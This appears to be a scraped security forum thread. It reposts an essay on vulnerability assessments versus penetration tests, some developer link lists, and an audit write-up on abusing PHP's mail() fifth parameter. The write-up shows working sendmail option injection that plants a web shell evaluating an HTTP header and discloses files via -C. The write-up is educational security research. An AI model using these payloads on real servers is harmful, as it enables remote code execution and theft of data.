It's worth stating explicitly that these two types of security test are in fact quite different. Many make the mistake of thinking that a penetration test is simply a vulnerability assessment with exploitation, or that a vulnerability assessment is a penetration test without exploitation. This is incorrect. If that were the case then we'd simply have one term that we'd qualify with "with or without exploitation".

A web application vulnerability assessment is fundamentally different from a penetration test because its focus is on creating a list of as many findings as possible for a given web application. A penetration test, on the other hand, has a completely different purpose. Rather than yield a list of problems, a penetration test's focus is the achievement of a specific goal set by the customer, e.g. "dump the customer database", or "become an administrative user within the application". Also important to note is the fact that a penetration test is successful if and when the goal is achieved, not when a massive list of vulnerabilities is produced. That's what a vulnerability assessment is for.

Some are tempted to say that this is a goal-based penetration test. My question to them is simple: "As opposed to what other type?" Penetration testing is goal-based.
That's its entire purpose. Even a customer direction as nebulous as "see what you can do" is absolutely a goal: an implicit goal of getting as far as you can given whatever constraints are in place.

The question of exploitation is another obstacle to clarity on this topic. Many have a simple binary switch for using the terms: "If there's exploitation it's a penetration test, and if not it's a vulnerability assessment." Again, the key difference here is list-based vs. goal-based, not exploitation. It's possible to do (or not do) exploitation in both types of test. You can have a web vulnerability assessment where you are to exploit anything you find, and you can have a penetration test where you are asked to confirm that you can do something but not actually do it. Exploitation is an independent attribute that can be attached to either type of test.

When to Use One vs. the Other

Now that we see a distinction between the terms, the next question is, "Which one is best?" Which should we be offering customers? As you may expect, the answer is that it depends on the customer and the project, but in my experience the answer will usually end up being a vulnerability assessment. Why? Because a vulnerability assessment (getting a list of everything that needs fixing) is usually where most customers are in terms of maturity.

To tightly summarize:

via h30499.www3.hp.com

Daniel's dissertation on this matter is excellent. As the security landscape changes we will see more actual pentests occur, but right now most of what your testers are doing are assessments sold as pentests. That isn't a bad thing. Pentesting is sexy because it has been marketed that way, not necessarily because it is better (or even a more fun project to work on) but because it fits a FUD marketing niche. When I do perform an actual penetration test, I prefer pentests with open goals where, within the context of the business, my team can go after what they think affects the business the most.
It's an important distinction that what the business "thinks" are the crown jewels (what keeps it running, or what is most valuable) is not necessarily what can hurt it the most. Some of our best attacks have been side-channel, crazy things that have shown some of our awesome customers better ways to secure themselves. Assessments and pentests will probably continue to be muddled terms hacked together by sales guys who work for bad consultancies for years to come. It's important for testers and PMs to know the real differences though.

There is an even longer version of this discussion on his blog (http://danielmiessler.com/writing/va_vs_pt/#).

November 2, 2011 Jhaddix

Sursa: http://www.securityaegis.com/vulnerability-assessment-vs-penetration-testing/
  11. Using mail() for Remote Code Execution

Submitted by geoffrey on Thu, 11/03/2011 - 15:30

Last week we had to assess the security level of a PHP web application from its source code, in a white-box context. During this audit we found original ways to take advantage of the mail() function for remote code execution and file disclosure attacks while bypassing open_basedir. This article explains the approaches used for that type of audit, how PHP handles the mail function and how to perform such attacks using it.

Methodologies

There are three well-known approaches to auditing an application from its source code. The first one is the top-down approach, which consists of starting from an entry point of the program and following all code branches. The second is the bottom-up approach: the auditor first establishes a list of interesting functions to audit and identifies the code areas where user inputs are used. There are pros and cons to both methods. The first one is time-consuming but covers all the source code and provides a great understanding of how the application works. The latter is a time saver and focuses on the areas most likely to be vulnerable, but doesn't follow all code branches and misses some kinds of vulnerabilities, for example logic issues. Note that there is also a third way which combines the benefits of both methods and tries to limit their disadvantages: the hybrid method.

Vulnerable code

In our audit we decided to use the top-down methodology, and after a while we saw this piece of code (recreated for confidentiality reasons) which at first glance seems normal:

$mail = new sendMail;
$mail->setTo(input::post('to'));
$mail->setSubject(input::post('subject'));
$mail->setFrom(input::post('from'));
$mail->setMessage(input::post('message'));
$mail->send();

The method input::post is in fact a simple wrapper to get values from the $_POST array, controlled by the user.
Next the setFrom function is called, which looks like the following:

if (preg_match('#^[a-zA-Z0-9_.-]+@[a-zA-Z0-9-]+.[a-zA-Z0-9-.]+#', $from))
    $this->from = (string) $from;

The meta-character $ is not used, so the check made with preg_match can be bypassed: the regex is applied only to the beginning of the subject string, not all of it. After setting the different parameters, the send function is executed:

mail($this->to, $this->subject, $this->message, ..., "-f{$this->from}");

We can see that the variable from, controlled by the user, is passed in the fifth parameter of the mail function.

Analysing mail()

Using Reflection from the shell we can quickly see how the mail function is declared:

php --rf mail
Function [ <internal:standard> function mail ] {
  - Parameters [5] {
    Parameter #0 [ <required> $to ]
    Parameter #1 [ <required> $subject ]
    Parameter #2 [ <required> $message ]
    Parameter #3 [ <optional> $additional_headers ]
    Parameter #4 [ <optional> $additional_parameters ]
  }
}

In our case we control several parameters passed to mail, but the most interesting one is the fifth. Quoting php.net:

The additional_parameters parameter can be used to pass additional flags as command line options to the program configured to be used when sending mail, as defined by the sendmail_path configuration setting. For example, this can be used to set the envelope sender address when using sendmail with the -f sendmail option.

What we want to know now is how the command line options are passed to sendmail. For example, we could try to exploit a shell escaping vulnerability or abuse sendmail options.
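As an aside, the missing end anchor in the setFrom check is easy to demonstrate outside PHP. Below is a quick sketch (Python used purely for illustration; like an unanchored preg_match, re.match only requires the pattern to match a prefix of the input, and the email values are hypothetical):

```python
import re

# Same pattern as the vulnerable setFrom check, anchored only at the start
# (the unescaped dot is copied from the original).
EMAIL_PREFIX = re.compile(r'^[a-zA-Z0-9_.-]+@[a-zA-Z0-9-]+.[a-zA-Z0-9-.]+')

def looks_like_email(value: str) -> bool:
    # Without a trailing $ (or \Z), anything may follow a valid-looking prefix.
    return EMAIL_PREFIX.match(value) is not None

assert looks_like_email("alice@example.com")
# A valid prefix followed by extra sendmail options still passes the check:
assert looks_like_email("alice@example.com -OQueueDirectory=/tmp -X/var/www/back.php")

# Anchoring the end rejects the smuggled options:
EMAIL_FULL = re.compile(r'^[a-zA-Z0-9_.-]+@[a-zA-Z0-9-]+.[a-zA-Z0-9-.]+$')
assert EMAIL_FULL.match("alice@example.com -X/var/www/back.php") is None
```

This is exactly the one-character fix the article alludes to: adding the $ anchor would have stopped the whole attack chain.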
In order to do so we downloaded the PHP 5.3.0 source code and found that the code handling mail is located in ext/standard/mail.c:

/* {{{ proto int mail(string to, string subject, string message [, string additional_headers [, string additional_parameters]])
   Send an email message */
PHP_FUNCTION(mail)
{
    char *to=NULL, *message=NULL, *headers=NULL;
    char *subject=NULL, *extra_cmd=NULL;
    int to_len, message_len, headers_len = 0;
    int subject_len, extra_cmd_len = 0, i;
    char *force_extra_parameters = INI_STR("mail.force_extra_parameters");
    char *to_r, *subject_r;
    char *p, *e;

    if (PG(safe_mode) && (ZEND_NUM_ARGS() == 5)) {
        php_error_docref(NULL TSRMLS_CC, E_WARNING, "SAFE MODE Restriction in effect. The fifth parameter is disabled in SAFE MODE");
        RETURN_FALSE;
    }

    if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "sss|ss", &to, &to_len, &subject, &subject_len, &message, &message_len, &headers, &headers_len, &extra_cmd, &extra_cmd_len) == FAILURE) {
        return;
    }

As you can see, the safe_mode implementation is not centralised: for each function concerned by this directive, the developers must consider all the safe_mode restrictions and ensure that they are properly applied, otherwise the protection can be bypassed. That is one of the many reasons why this directive is now turned off by default. In the case of mail, use of the fifth parameter is restricted when safe_mode is enabled, which is why the number of arguments passed to the function is checked. Then the zend_parse_parameters function is called and extra_cmd is set from the fifth parameter.

    if (force_extra_parameters) {
        extra_cmd = php_escape_shell_cmd(force_extra_parameters);
    } else if (extra_cmd) {
        extra_cmd = php_escape_shell_cmd(extra_cmd);
    }

    if (php_mail(to_r, subject_r, message, headers, extra_cmd TSRMLS_CC)) {
        RETVAL_TRUE;

The variable extra_cmd is then passed to php_escape_shell_cmd, which escapes special characters that could be used to execute other commands. Finally the php_mail function is called.
/* {{{ php_mail
 */
PHPAPI int php_mail(char *to, char *subject, char *message, char *headers, char *extra_cmd TSRMLS_DC)
{
    ... snip ...
    FILE *sendmail;
    int ret;
    char *sendmail_path = INI_STR("sendmail_path");
    char *sendmail_cmd = NULL;
    char *mail_log = INI_STR("mail.log");
    char *hdr = headers;
    ... snip ...
    if (extra_cmd != NULL) {
        spprintf(&sendmail_cmd, 0, "%s %s", sendmail_path, extra_cmd);
    } else {
        sendmail_cmd = sendmail_path;
    }
    ... snip ...
    sendmail = popen(sendmail_cmd, "w");

PHP retrieves the value of the sendmail_path directive and uses spprintf to build the command line sendmail_cmd, which is then passed to popen. Let's take an example to see what the final command looks like:

(gdb) file php
Reading symbols from /opt/php-5.3.0/sapi/cli/php...done.
(gdb) set args -r 'mail("a@b.com", "s", "m", "", "-arg val");'
(gdb) b mail.c:291
Breakpoint 1 at 0x83f39b2: file /opt/php-5.3.0/ext/standard/mail.c, line 291.
(gdb) r
Starting program: /opt/php-5.3.0/sapi/cli/php -r 'mail("a@b.com", "s", "m", "", "-arg val");'
[Thread debugging using libthread_db enabled]

Breakpoint 1, php_mail (to=0x8b5c2b8 "a@b.com", subject=0x8b5c2ec "s", message=0x8b5be2c "m", headers=0x8b5be9c "", extra_cmd=0x8b5c31c "-arg val") at /opt/php-5.3.0/ext/standard/mail.c:291
291       sendmail = popen(sendmail_cmd, "w");
(gdb) p sendmail_path
$1 = 0x89af284 "/usr/sbin/sendmail -t -i "
(gdb) p sendmail_cmd
$2 = 0x8b5c35c "/usr/sbin/sendmail -t -i -arg val"

Now that we have a good understanding of how mail works, we can focus on the exploitation step. The sendmail program provides several well-documented parameters and options. Exploiting sendmail is a known subject, but the context we are facing is quite different from previously published scenarios: we can only pass it parameters escaped with php_escape_shell_cmd.
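The takeaway from the source reading above is that php_escape_shell_cmd neutralizes shell metacharacters but leaves spaces and dashes alone: you cannot chain a second shell command, yet you can still smuggle extra options to sendmail. The sketch below is a rough, simplified model of that behaviour in Python (escape_shell_cmd is a stand-in for the PHP internal, and the escape list is abbreviated):

```python
# Simplified model of PHP's php_escape_shell_cmd: backslash-escape shell
# metacharacters, but leave spaces and dashes untouched.
SHELL_META = set('#&;`|*?~<>^()[]{}$\\\n"\'')

def escape_shell_cmd(cmd: str) -> str:
    return ''.join('\\' + c if c in SHELL_META else c for c in cmd)

sendmail_path = "/usr/sbin/sendmail -t -i"
extra_cmd = escape_shell_cmd("-OQueueDirectory=/tmp -X /var/www/uploads/back.php")

# Mirrors: spprintf(&sendmail_cmd, 0, "%s %s", sendmail_path, extra_cmd);
sendmail_cmd = f"{sendmail_path} {extra_cmd}"

# Classic command injection is defused by the escaping...
assert escape_shell_cmd("x; rm -rf /") == "x\\; rm -rf /"
# ...but option injection survives: the sendmail flags reach popen() intact.
assert "-X /var/www/uploads/back.php" in sendmail_cmd
```

This asymmetry (escaping stops command chaining, not argument injection) is what the rest of the article exploits.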
Code execution

The main idea for this type of attack was to send a special string containing PHP code in the SMTP message, and to use sendmail features to log the message into a file with a php extension. This implies that we must have write permission to create/modify the targeted file. After some research we saw that the -X parameter can be used to log the traffic between the client and the MTA: this is exactly what we are looking for. In order to see which parameters can be used to inject PHP code into the log file, we tested each of them:

# PHPFROM="<?php CLI; ?>"
# SUBJECT="<?php SUBJECT; ?>"
# MESSAGE="<?php BODY; ?>"
# HEADERS="<?php HEADER; ?>"
# PARAMS="-f\'${PHPFROM}\' -OQueueDirectory=/tmp -X /var/www/uploads/back.php"
# php -r "mail('a@b.c', '${SUBJECT}', '${MESSAGE}', '${HEADERS}', '${PARAMS}');"

Parameters passed to sendmail bypass the restrictions imposed by open_basedir, because this directive only checks paths used in a PHP context. The content of the created file was the following:

03785 <<< To: a@b.c
03785 <<< Subject: <?php SUBJECT; ?>
03785 <<< X-PHP-Originating-Script: 1000:Command line code
03785 <<<
03785 <<< <?php BODY; ?>
03785 <<< [EOF]
03785 === CONNECT [127.0.0.1]
03785 <<< 220 self.com ESMTP Sendmail 8.14.4/8.14.4/Debian-2ubuntu1;...
03785 >>> EHLO self.com
03785 <<< 250-self.com Hello localhost [127.0.0.1], pleased to meet you
03785 <<< 250-ENHANCEDSTATUSCODES
03785 <<< 250-PIPELINING
03785 <<< 250-EXPN
03785 <<< 250-VERB
03785 <<< 250-8BITMIME
03785 <<< 250-SIZE
03785 <<< 250-DSN
03785 <<< 250-ETRN
03785 <<< 250-AUTH DIGEST-MD5 CRAM-MD5
03785 <<< 250-DELIVERBY
03785 <<< 250 HELP
03785 >>> MAIL From:<\<\?php.CLI\;.\?\>@self.com> SIZE=119
03785 <<< 250 2.1.0 <\<\?php.CLI\;.\?\>@self.com>... Sender ok
03785 >>> RCPT To:<a@b.c>
03785 >>> DATA
03785 <<< 250 2.1.5 <a@b.c>... Recipient ok
03785 <<< 354 Enter mail, end with "." on a line by itself
03785 >>> Received: (from yup@localhost)
03785 >>>     by self.com (8.14.4/8.14.4/Submit) id p9S9C8p1003785;
03785 >>>     Fri, 28 Oct 2011 11:12:08 +0200
03785 >>> Date: Fri, 28 Oct 2011 11:12:08 +0200
03785 >>> From: \<\?php.CLI\;.\?\>@self.com
03785 >>> Message-Id: <201110280912.p9S9C8p1003785@self.com>
03785 >>> X-Authentication-Warning: self.com: yup set sender to \<\?php CLI\; \?\> using -f
03785 >>> X-Authentication-Warning: self.com: Processed from queue /tmp
03785 >>> To: a@b.c
03785 >>> Subject: <?php SUBJECT; ?>
03785 >>> X-PHP-Originating-Script: 1000:Command line code
03785 >>>
03785 >>> <?php HEADER; ?>
03785 >>>

As you can see, there is no problem if we control the subject, the message or the headers: the PHP code stored in the file back.php will get executed. But this adds a condition: we would have to control the fifth parameter and another one. That is the case for the application we audited, but we wanted a way to exploit this even when only the last parameter is controlled. The fifth parameter is escaped and will not result in PHP code execution by itself, but we found a way to bypass that by putting the character @ into the from (-f) parameter passed to sendmail:

# PHPFROM="<?php CLI;/*@*/ ?>"
# SUBJECT=;MESSAGE=;HEADERS=;
# PARAMS="-f\'${PHPFROM}\' -OQueueDirectory=/tmp -X /var/www/uploads/back.php"
# php -r "mail('a@b.c', '${SUBJECT}', '${MESSAGE}', '${HEADERS}', '${PARAMS}');"

Which results in:

06532 >>> MAIL From:<\<\?php.CLI\;/\*@\*/\?\>> SIZE=72
06532 <<< 250 2.1.0 <\<\?php.CLI\;/\*@\*/\?\>>... Sender ok
06532 >>> RCPT To:<a@b.c>
06532 >>> DATA
06532 <<< 553 5.1.8 <a@b.c>... Domain of sender address <?php.CLI;/*@*/?> does not exist

When we put the character @, sendmail tries to resolve the domain */?>.com by making a DNS query. Because the domain doesn't exist, it outputs an error containing the sender's email address, formatted: spaces are replaced by dots and, magically, the character \ is removed.
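That last step can be modelled in a few lines: sendmail's error formatting rewrites the sender address, replacing spaces with dots and dropping the backslashes that php_escape_shell_cmd inserted. The following is a toy reconstruction of the observed behaviour, not sendmail's actual code:

```python
def format_sender(addr: str) -> str:
    # Observed in the 553 error above: spaces become dots,
    # and the escaping backslashes are dropped.
    return addr.replace(' ', '.').replace('\\', '')

# The escaped payload as it reaches sendmail via -f:
escaped = r"<\?php CLI\;/\*@\*/\?\>"
assert format_sender(escaped) == "<?php.CLI;/*@*/?>"
```

The transformation undoes the escaping entirely; the only damage left is that spaces have turned into dots, which is the problem the next paragraph solves.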
The effects of php_escape_shell_cmd are now removed, but we must still find a way to execute PHP code without entering whitespace. To do so we checked how the Zend Engine handles the PHP open tags and decides whether or not to execute the code. It uses Lex rules located in Zend/zend_language_scanner.l:

WHITESPACE [ \n\r\t]+
NEWLINE ("\r"|"\n"|"\r\n")
... snip ...
<INITIAL>"<script"{WHITESPACE}+"language"{WHITESPACE}*"="{WHITESPACE}*("php"|"\"php\""|"'php'"){WHITESPACE}*">" {
... snip ...
<INITIAL>"<%=" { if (CG(asp_tags)) {
... snip ...
<INITIAL>"<?=" { if (CG(short_tags)) {
... snip ...
<INITIAL>"<%" { if (CG(asp_tags)) {
... snip ...
<INITIAL>"<?php"([ \t]|{NEWLINE}) {
... snip ...
<INITIAL>"<?" { if (CG(short_tags)) {

Looking at this code we can conclude that the only open tags that don't require whitespace are short tags, which are enabled by default, and ASP tags.

# PHPFROM="<?if(isset(\$_SERVER[HTTP_SHELL]))eval(\$_SERVER[HTTP_SHELL]);/*@*/?>"
# SUBJECT=;MESSAGE=;HEADERS=;
# PARAMS="-f\'${PHPFROM}\' -OQueueDirectory=/tmp -X /var/www/uploads/back.php"
# php -r "mail('a@b.c', '${SUBJECT}', '${MESSAGE}', '${HEADERS}', '${PARAMS}');"

Using these commands, we now have remote code execution on the application:

08744 <<< 553 5.1.8 <a@b.c>... Domain of sender address <?if(isset($_SERVER[HTTP_SHELL]))eval($_SERVER[HTTP_SHELL]);/*@*/?> does not exist

At the end of the audit we also found a way to exploit this even if short_open_tag is turned off: sendmail replaces the \n character with a space, so we can use the standard open tags.

File disclosure

The -C parameter makes sendmail use an alternate configuration file. Pointing this parameter at an invalid configuration file causes sendmail to output an error for each line it doesn't understand. This can be used to display the content of a targeted file.
# SUBJECT=;MESSAGE=;HEADERS=;
# PARAMS="-C/var/www/phpinfo.php -OQueueDirectory=/tmp -X/var/www/uploads/f.txt"
# php -r "mail('a@b.c', '${SUBJECT}', '${MESSAGE}', '${HEADERS}', '${PARAMS}');"

These commands write the content of the file phpinfo.php to f.txt:

04151 >>> /var/www/phpinfo.php: line 1: unknown configuration line "<?php"
04151 >>> /var/www/phpinfo.php: line 3: unknown configuration line "phpinfo();"
04151 >>> /var/www/phpinfo.php: line 5: unknown configuration line "?>"
04151 >>> No local mailer defined

Note also that if you have trouble obtaining remote code execution with the method explained previously, you can use this parameter: if you can inject PHP code into a file located on the webserver (e.g. session files, apache logs, etc.), you can then write its content into a php file and execute it.

Conclusion

In this audit, the vulnerability was caused by a single missing character, which led us to remote code execution. Diving into PHP internals helped us see the protections applied and understand how mail is handled, and later, thanks to the Lex rules, figure out how to bypass the whitespace restriction. In the exploitation part we also showed how to circumvent the constraints imposed by php_escape_shell_cmd and short_open_tag. Finally, the most important things to keep in mind are the methodology, the tests and the research we did, not the final exploitation itself.

Sursa: Using mail() for Remote Code Execution | Sogeti ESEC Pentest

See also the links in the article.
  12. Interesting:

Const ady = "@targuOCna@"

Private Shared Function beleste(ByVal bas As String, ByVal sadsa As Long) As String()
    Dim carnatzel As Long = Math.Ceiling(bas.Length / sadsa)
    Dim piula(carnatzel - 1) As String
    Dim MAMAIE As Long = 0
    Dim pompeaza = IO.File.OpenWrite(dialog2.FileName)
    Dim marishor = pompeaza.Seek(0, IO.SeekOrigin.[End])
  13. Registry Decoder Digital Forensics Software

Digital forensics deals with the analysis of artifacts on all types of digital devices. One of the most prevalent analysis techniques performed is that of the registry hives contained in Microsoft Windows operating systems. Registry Decoder was developed with the purpose of providing a single tool for the acquisition, analysis, and reporting of registry contents. To learn the history of this project, please see the history page.

Registry Decoder is a free and open source tool. The online acquisition component can be accessed at: regdecoderlive - Automated, live acquisition of registry files - Google Project Hosting, and the offline analysis component at: registrydecoder - Automated Acquisition, Analysis, and Reporting of Registry Contents - Google Project Hosting. All functionality contained within the two components is exposed through a graphical user interface, and the tool aims to provide even novice investigators with powerful analysis capabilities.

Another goal of Registry Decoder is to become the project in which all future registry-related research is performed and developed. If you are a researcher interested in open problems within registry forensics research, or are interested in contributing to the project, please see our research page. To follow the latest developments of Registry Decoder, please follow our Twitter account @dfsforensics.

Live: regdecoderlive - Automated, live acquisition of registry files - Google Project Hosting
Offline: registrydecoder - Automated Acquisition, Analysis, and Reporting of Registry Contents - Google Project Hosting

Sursa: Registry Decoder Digital Forensics Software | Registry Decoder
  14. Using NoSQL and analyzing big data

Learn how to handle massive amounts of distributed data with schemaless datastores

Date: 07 Oct 2011 (Published 19 May 2011) | Level: Introductory

1. Getting started with NoSQL

NoSQL datastores are moving to the forefront because they solve the problem of scalability on a massive scale. Schemaless datastores are fundamentally different from traditional relational databases, but leveraging them is easier than you might think.

Read: Java development 2.0: NoSQL

2. Hands-on introduction to popular NoSQL datastores

Now that you have the basics of NoSQL down, it's time to explore some of the more popular datastores. Get a hands-on introduction to MongoDB, CouchDB, and Amazon's SimpleDB, as well as Google AppEngine's multiple storage options.

Read: MongoDB: A NoSQL datastore with (all the right) RDBMS moves
Listen: Eliot Horowitz on MongoDB
Watch: MongoDB video demo
Read: Cloud storage with Amazon's SimpleDB (two-part article)
Watch: Video demo: An introduction to Amazon SimpleDB
Read: REST up with CouchDB and Groovy's RESTClient
Listen: Aaron Miller and Nitin Borwankar on CouchDB and the CouchOne mobile platform
Read: GAE storage with Bigtable, Blobstore, and Google Storage

3. Analyzing distributed data with MapReduce

A key enabling technology of the big data revolution is MapReduce: a programming model and implementation developed by Google for processing massive-scale, distributed data sets.
Explore Apache Hadoop, an open source MapReduce implementation that plays a major role in IBM's approach to big data analysis.

Read: Big data analysis with Hadoop MapReduce
Read: Solve cloud-related big data problems with MapReduce
Read: Crunch your existing data using Apache Hadoop
Download: IBM MapReduce Tools for Eclipse
Read: A conversation with Rod Smith, IBM's Mr. Big Data

Sursa si link-urile necesare: http://www.ibm.com/developerworks/training/kp/j-kp-nosql/index.html
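To make the MapReduce programming model described above concrete, here is a toy word count in plain Python that mirrors the three phases (map, shuffle/group, reduce). Real Hadoop jobs distribute these same steps across a cluster; the function names and sample documents here are only illustrative:

```python
from collections import defaultdict

def map_phase(documents):
    # map: emit a (word, 1) pair for every word in every document
    for doc in documents:
        for word in doc.split():
            yield word.lower(), 1

def shuffle_phase(pairs):
    # shuffle: group all emitted values by key
    grouped = defaultdict(list)
    for key, value in pairs:
        grouped[key].append(value)
    return grouped

def reduce_phase(grouped):
    # reduce: sum the counts for each word
    return {word: sum(counts) for word, counts in grouped.items()}

docs = ["big data big plans", "big data analysis"]
counts = reduce_phase(shuffle_phase(map_phase(docs)))
assert counts == {"big": 3, "data": 2, "plans": 1, "analysis": 1}
```

The scalability win comes from the fact that map calls are independent per document and reduce calls are independent per key, so both phases parallelize naturally across machines.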
  15. Cheat Sheets for Developers

Design Patterns (Architecture)
Getting Started with Ajax (HTML, JavaScript, Web Services/Servers)
Spring Configuration (Java, XML)
Core CSS: Part I (CSS)
jQuery Selectors (CSS, JavaScript)
Getting Started with Eclipse (ALM, Eclipse, IDE)
Core Java Concurrency (Algorithms, Java)
Windows PowerShell (.NET, Windows)
Core Java (Algorithms, Java, Standards)
Core CSS: Part II (CSS)
Core CSS: Part III (CSS)
Essential MySQL (Database, Open Source)
Scrum (Agile/Methodologies)
Core HTML (HTML)
Apache Maven 2 (ALM, Java, Open Source)
Dependency Injection in EJB 3 (Java, Standards, XML)
Spring Annotations (Java)
Using XML in Java (Java, XML)
Getting Started with Git (ALM, Open Source)
Getting Started with UML (ALM, Architecture, Open Source)
JavaServer Faces (Design/UX, Java, Standards, XML)
JUnit and EasyMock (ALM, Java)
Getting Started with Java GUI Development (Design/UX, Java)
Getting Started with JPA (Database, Java, Standards)
Getting Started with Domain-Driven Design (Agile/Methodologies, Architecture)
HTML5: New Standards for Web Interactivity (HTML, Standards)
PHP (Algorithms, Database, PHP)
C# (.NET, C#)
SOA Patterns (Architecture, SOA, Web Services/Servers)
JavaServer Faces 2.0 (Java, Standards)
Groovy (Groovy, Java)
Google App Engine for Java (Cloud, Java)
Getting Started with Cloud Computing (Cloud)
Continuous Integration: Patterns and Anti-patterns (ALM)
Struts2 (Design/UX, Java, Open Source)
REST: Foundations of RESTful Architecture (Standards, Web Services/Servers)
Very First Steps in Flex (Flex/ActionScript, Java, Web Services/Servers)
Getting Started with Hibernate Search (Database, Java, Search)
JDBC Best Practices (Architecture, Database, Java, Standards)
GWT Style, Configuration and JSNI Reference (Java, JavaScript)
Core .NET (.NET, C#)
Essential JSP Expression Language (Java, Standards)
Designing Quality Software: Architectural and Technical Best Practices (Architecture)
Essential Ruby (Ruby)
Scalability & High Availability (Architecture, Big Data, Database)
Getting Started with Maven Repository Management (ALM, Java)
Getting Started with Firebug 1.5 (ALM, CSS, HTML, JavaScript)
RSS and Atom (Content Management, Web Services/Servers)
Agile Adoption: Improving Software Quality (Agile/Methodologies, Architecture)
Contexts and Dependency Injection for the Java EE Platform (Java, Standards)
Getting Started with Java EE Security (Java, Security, Standards)
Getting Started with NoSQL and Data Scalability (Big Data, Database, NoSQL)
JBoss RichFaces (Java, Standards, XML)
Agile Adoption: Reducing Cost (Agile/Methodologies)
Spring Web Flow (Design/UX, E-Commerce, IDE, Java)
Getting Started with Apache Ant (ALM, Java, Open Source, XML)
Getting Started with Kanban for Software Development (Agile/Methodologies)
Objective-C for the iPhone and iPad (C/C++, iOS)
Getting Started with Application Lifecycle Management (ALM)
Continuous Delivery: Patterns and Antipatterns in the Software Lifecycle (Agile/Methodologies, ALM, DevOps)
NetBeans IDE 7: Programming in Java 7 (IDE, Java, NetBeans)
Getting Started with JavaFX (Java)
Essential PostgreSQL (Database, Open Source)
Continuous Integration: Servers and Tools (ALM, Open Source)
What's New in JPA 2.0 (Database, Java, Standards)
Agile Adoption: Decreasing Time to Market (Agile/Methodologies, ALM)
Core ASP.NET (.NET, C#)
Effective Process Modeling with BPM & BPMN (Agile/Methodologies, Other Languages)
Getting Started with Spring-DM (Architecture, Java)
Getting Started with Grails (Groovy)
Getting Started with Selenium (ALM, JavaScript, Open Source)
Getting Started with Virtualization (.NET, Virtualization)
Getting Started with Lean Software Development (Agile/Methodologies)
Getting Started with Visual Studio 2010 (.NET, C#, IDE)
Spring Roo: Making Java Fun Again (IDE, Java)
Java Enterprise Edition 6: The Most Elegant Enterprise Java yet (Java)
Silverlight 2 (.NET, C#, Design/UX)
Getting Started with MyEclipse (Eclipse, IDE, Java)
Core Seam (Java, Security, XML)
Getting Started with Eclipse RCP (Eclipse, IDE)
Getting Started with JBoss Enterprise Application Platform 5 (ALM, Java, Standards)
Application Prototyping with SketchFlow (.NET, ALM, Design/UX)
Getting Started with Apache Hadoop (Architecture, Big Data, Database, Open Source)
Apache Solr: Getting Optimal Search Results (Algorithms, Search, Web Services/Servers, XML)
Getting Started with Equinox and OSGi (Architecture, Eclipse, Java)
Flex & Spring Integration (Flex/ActionScript, Java, XML)
Getting Started with Drupal (Content Management, PHP)
Getting Started with Apache Wicket (Design/UX, Java, Open Source)
Eclipse Plug-in Development (Eclipse)
Getting Started with Windows Communication Foundation 4.0 (.NET, Web Services/Servers)
Getting Started with ASP.NET MVC 1.0 (.NET)
Getting Started with Windows Presentation Foundation (.NET, Design/UX)
Getting Started with GlassFish Application Server v3 (Java, Standards, Web Services/Servers)
Flex 4 and Spring 3 Integration (Flex/ActionScript, Java, Web Services/Servers, XML)
Eclipse Tools for Spring: The SpringSource Tool Suite (Eclipse, IDE, Java)
Flexible Rails: Flex 3 on Rails 2 (Flex/ActionScript, Ruby)
IntelliJ IDEA (ALM, IDE)
SOA Governance (SOA)
Seam UI (Design/UX, Java, Standards)
Getting Started with BIRT (ALM, Business Intelligence/Reporting, Eclipse, Java)
Essential F# (.NET, Other Languages)
Expression-Based Authorization with Spring Security 3 (Java, Security, XML)
Selenium 2.0: Using the WebDriver API to Create Robust User Acceptance Tests (ALM, JavaScript, Open Source)
The MVVM Design Pattern: A Formula for Elegant, Maintainable Mobile Apps (.NET, Architecture, Windows Phone)
Node.js: Building for Scalability with Server-Side JavaScript (JavaScript, Open Source)
Vaadin: A Familiar Way to Build Web Apps with Java (Design/UX, Java, JavaScript)
Essential EMF (Architecture, Eclipse, Java, Other Languages, XML)
Core WS-BPEL: Business Process Execution Language (Agile/Methodologies, Other Languages, Standards)
Getting Started with Silverlight and Expression Blend (.NET, C#, Design/UX, IDE)
Liferay Essentials: A Definitive Guide for Enterprise Portal Development (Content Management, Design/UX, Java)
Understanding Lucene: Powering Better Search Results (Algorithms, Java, Search, XML)
RichFaces 4.0: A Next Generation JSF Framework (Java, Standards, XML)
EclipseLink JPA: An Advanced ORM Persistence Framework (Database, Eclipse, Java)
Core Mule (Architecture, Open Source, SOA)
Getting Started with the Zend Framework (IDE, Open Source, PHP)
Getting Started with Fitnesse (ALM)
Functional Programming with Clojure: Simple Concurrency on the JVM (Clojure, Java)
NetBeans Platform 7.0: A Framework for Building Pluggable Enterprise Applications (IDE, Java)
Mule 3: Simplifying SOA (Open Source, SOA, Web Services/Servers)
Apache Tapestry 5.0 (Design/UX, Java, Standards)
Getting Started with Oracle Berkeley DB (Database, NoSQL)
Getting Started with BlazeDS (Flex/ActionScript, Java, Web Services/Servers)
ADO.NET Entity Framework: Object-Relational Mapping and Data Access (.NET, Database, IDE)
ServiceMix 4.2: The Apache Open Source ESB (Architecture, Open Source, SOA, Web Services/Servers)
Apache Hadoop Deployment: A Blueprint for Reliable Distributed Computing (Algorithms, Architecture, Big Data, Database, Open Source)
WebMatrix: Advanced Web Development Made Simple (.NET, Content Management, E-Commerce, PHP, Windows)
Flex Mobile Development: Build Apps for Android, iOS, and BlackBerry Tablet OS (Android, Flex/ActionScript, IDE, iOS)
IntelliJ IDEA: Updated for 8.1 (IDE)
Getting Started with Adobe Flash Builder 4 (Flex/ActionScript, IDE)
Getting Started with PHP and Flex (Flex/ActionScript, PHP)
PHPUnit: PHP Test-Driven Development - Automated Tools to Improve Your PHP Code Quality (ALM, PHP)
Cloud Computing with Windows Azure Platform (.NET, Cloud, Windows)
The Top Twelve Integration Patterns for Apache Camel (Architecture, Java, XML)
Mastering Portal UI Development With Vaadin and Liferay (Content Management, Design/UX, Java)
Getting Started with db4o: Persisting .NET Object Data (.NET, Database)
Getting Started with ColdFusion 9 (ColdFusion)
Getting Started with LiveCycle Data Services ES (Database, E-Commerce, Flex/ActionScript, Java)
Getting Started with Griffon (Groovy, Open Source)
Getting Started with Infinispan (Database, Java, NoSQL, Open Source, XML)
Open Source Media Framework: Building Simple Custom Video Players (Design/UX, Flex/ActionScript, Video/Animation)
Developing a Silverlight Application for Windows Phone 7 (.NET, Windows Phone)
Mastering Portals with a Portlet Bridge (Architecture, Content Management, Design/UX, Java, Standards)
Adobe Flash Builder 4.5: Develop for Web, Desktop and Mobile (Flex/ActionScript, IDE)
